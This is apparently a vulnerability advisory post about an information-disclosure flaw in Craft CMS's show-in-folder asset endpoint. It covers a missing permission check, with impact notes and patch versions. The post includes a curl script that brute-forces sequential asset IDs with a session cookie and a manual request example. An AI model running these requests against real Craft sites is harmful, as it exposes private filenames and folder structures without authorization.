Listen to this Post
The vulnerability resides in the `actionShowInFolder` method within src/controllers/AssetsController.php. This method is designed to return an asset’s filename and its complete folder hierarchy when supplied an asset ID. However, it fails to verify that the authenticated user possesses the necessary `viewAssets` or `viewPeerAssets` permissions for the volume containing the target asset. Consequently, any authenticated user with only the `accessCp` permission can call this endpoint.
The method execution proceeds as follows:
1. `requireCpRequest()` confirms the request is for the control panel but does not enforce any volume-level permission checks.
2. `Asset::findOne($assetId)` retrieves the asset directly from the database without applying an `editable` or `savable` scope filter, making assets from all volumes reachable.
3. The method then returns a JSON response containing the asset’s filename and the complete folder structure. This includes the volume handle, volume UID, and for each parent folder: its name, UID, and URI path.
4. An attacker can brute-force asset IDs, as they are sequential integers, to systematically enumerate the names and paths of private assets across the entire system.
This vulnerability is a direct example of an incomplete patch pattern. It mirrors four other security advisories (GHSA-x76w-8c62-48mg, GHSA-vgjg-248p-rfm2, GHSA-5pgf-h923-m958, GHSA-3pvf-vxrv-hh9c) that were patched on 2026-02-25. Those advisories added `requireVolumePermissionByAsset()` and `requirePeerVolumePermissionByAsset()` checks to sibling `AssetsController` actions. The `actionShowInFolder` method was introduced after the patch wave and was not protected, leaving this critical permission check omitted.
dailycve form:
Platform: Craft CMS
Version: before 4.17.8
Vulnerability: Info Disclosure
Severity: low
date: 2026-05-06
Prediction: Patch: 2026-02-25
Analytics under What Undercode Say:
Exploit script to brute-force asset IDs and dump folder structures BASE_URL="https://example.com/admin/actions/assets/show-in-folder" AUTH_COOKIE="your_craft_session_cookie_value_here" for id in $(seq 1 1000); do curl -s -X POST -b "CraftSessionId=$AUTH_COOKIE" \ -d "assetId=$id" \ "$BASE_URL" | jq '.' done
Manual request example
curl -X POST -H "Content-Type: application/json" \
-b "CraftSessionId=$AUTH_COOKIE" \
-d '{"assetId": 42}' \
"$BASE_URL"
Exploit:
An authenticated user can directly call the controller endpoint with a target assetId. This step can be automated to iterate through sequential asset IDs. For each asset, the server returns a JSON object exposing the filename and a complete path hierarchy. This includes volume names, volume UIDs, folder names, folder UIDs, and folder URI paths, all without any permission validation.
Protection from this CVE:
- Immediately update Craft CMS to version 4.17.8 or later for the 4.x branch, or to version 5.9.14 or later for the 5.x branch.
- As a workaround, apply a custom user-group permission via a plugin to restrict access to the `assets/show-in-folder` endpoint.
- Implement a global middleware that validates asset permissions before any asset-related controller actions are executed.
Impact:
- Any authenticated control panel user can discover filenames and the complete folder structure of private assets in volumes they should not access.
- This exposure of sensitive volume structures—such as private document repositories or confidential media—provides an attacker with valuable reconnaissance data.
- The disclosed paths and filenames can be used to launch further targeted attacks, including attempts to directly access or exfiltrate the actual file content via other potential vulnerabilities.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
